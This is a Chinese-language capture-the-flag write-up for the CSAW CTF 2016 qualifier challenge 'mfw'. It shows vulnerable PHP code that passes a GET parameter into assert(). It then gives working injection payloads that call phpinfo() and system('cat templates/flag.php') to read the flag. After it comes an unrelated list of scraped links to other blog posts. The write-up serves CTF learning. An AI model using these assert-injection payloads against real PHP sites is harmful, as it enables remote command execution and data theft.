[csaw-ctf-2016-quals]mfw

知识点:

assert构造执行php函数

命令执行

wp

git泄露,得到index.php和flag.php(git下来的里面没有东西,推测这是要读取的文件)

index.php

<?phpif (isset($_GET['page'])) {$page = $_GET['page'];
} else {$page = "home";
}$file = "templates/" . $page . ".php";// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");?>html代码<?phprequire_once $file;
?>

首先对strpos函数进行闭合,构造一下,page=')
可以把后面', '..') === false的给注释掉,构造page=').phpinfo();//,可以得到回显

index.php?page=').phpinfo();//
?page='.phpinfo().'      #不闭合也可以第一个payload相当于:
assert("strpos('templates/').phpinfo();//.php', '..') === false") or die("Detected hacking attempt!");

但是后面执行命令的时候必须要闭合…不知道为什么【可以了,是f12看不到,要查看源代码才行

?page=').system("cat templates/flag.php");//


?page='.system("cat templates/flag.php").'

[ctf web][csaw-ctf-2016-quals]mfw writeup相关推荐

  1. CSAW CTF 2016 PWN quals-warmup

    CSAW CTF 2016 PWN quals-warmup 原文链接 先对文件有个大致的了解,是64位ELF文件 ☁ csaw ctf 2016 quals-warmup ls exp.py fla ...

  2. CTF Web题 部分WP

    1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002 ...

  3. CTF Web学习(三)----python脚本的编写及应用

    CTF Web学习(三) python脚本的编写及应用 CTF Web学习目录链接 CTF Web学习(一):基础篇及头文件修改.隐藏 CTF Web学习(二):代码审计.burp suite应用 C ...

  4. ctf web必备工具_设计人员和开发人员的必备Web工具和服务

    ctf web必备工具 I cannot imagine that in 2018 there are people who don't use daily several web tools and ...

  5. CTF·WEB入门之路

    Hello~大家好,这里是KOKO师傅! 对于初学者来说,打CTF之路仿佛是摸石头过河,而今天这篇文章则是一篇"从入门到入土"级别的概括类文章.从这篇文章中你可以了解到CTF的一些 ...

  6. CTF Web入门 命令执行 笔记

    CTF Web入门 命令执行 eval(读取命令),但各种字符被ban if(!pregmatch("...",$c)) #指过滤了...eval($c); 这时候可以尝试 ?c= ...

  7. CTF Web方向考点总结

    CTF Web 0X00 前言 做题已经快四个月了,接触了大大小小的题型,收藏的大师傅们的解题思路.题型总结的博客已经很多了,每次都要一个一个翻很麻烦,于是写下了这一个总结,实际上是把各大博客内容汇总 ...

  8. CTF——web个人总结

    CTF web个人总结 仅供个人参考 从0开始接触到了CTF,算是入门了,为了方便自己做题,现在记录一下web类型题目的解题思路. 目录 CTF web个人总结 工具(含后渗透) 解题思路 一.普通思 ...

  9. 2021年云南省职工职业技能大赛CTF流量分析题(wireshark)WriteUp

    2021年云南省职工职业技能大赛CTF流量分析题(wireshark)WriteUp .0x00 前言 本人作为业余爱好者参加了2021年云南省职工职业技能大赛的网络安全比赛,比赛形式以CTF+理论考 ...

  10. 从0到1学习CTF WEB

    从0到1学习CTF WEB web前置技能 信息泄漏 密码口令 SQL注入 基础比较薄弱,准备逐题刷CTFHub的web类型题目顺便学习一下web方面的安全知识. web前置技能 1.请求方式: 隐藏 ...

最新文章

  1. pytroch 数据增量 transforms的二十二个方法
  2. 在load事件中关闭窗体
  3. Djang(在前端仿DjangoAdmin同样效果)
  4. Android--Activity的跳转及Activity之间的数据传递
  5. C++ 逆向笔记12 call和堆栈平衡
  6. 【暑期每日一题】洛谷 P6437 [COCI2011-2012#6] JACK
  7. 如何在 Word 的方框中打勾 √ ?☑ ☒
  8. 模式识别和机器视觉智能方面的论文投稿---国际著名期刊杂志论文投稿
  9. 新型搜索引擎Blekko欲赶超谷歌 再获3000万美元投资
  10. 树莓派如何接硬盘_树莓派3 挂载外接硬盘
  11. 微软账号登陆不上_微软抛弃“亲生儿子”,IE浏览器被限制,强制你更换Edge
  12. 《MySQL是怎么样运行的》读书笔记一 数据页+索引
  13. Ubuntu wine QQ 微信乱码
  14. 免费申请Jetbrains的产品
  15. 我对M4A文件格式的理解
  16. AForge学习笔记(3):AForge.Fuzzy
  17. 面向对象程序设计课程设计:利用决策树方法判定西瓜质量
  18. Android手机通过USB线共享电脑的网络上网
  19. 增加b格的win10快捷键(入门)入门增加效率
  20. linux id和iduser,su userid 和 su - userid的区别

热门文章

  1. 简单 黑苹果dsdt教程_提取DSDT和SSDT教程
  2. 数学三大危机与无穷小微积分
  3. 从零开始修炼电脑维修秘籍
  4. c++ 函数之间 传递向量_将向量传递给C ++中的函数
  5. 论文研读-社交媒体可视化-大规模地理社交媒体数据的可视化抽象与探索
  6. 郭德纲家训--话糙理不糙
  7. nodejs获取当前连接的网络ip
  8. 爬虫第3课 -豆瓣TOP250电影爬取
  9. [INFO] Using ‘UTF-8‘ encoding to copy filtered resources.错误
  10. OBD(On-Board-Diagnose)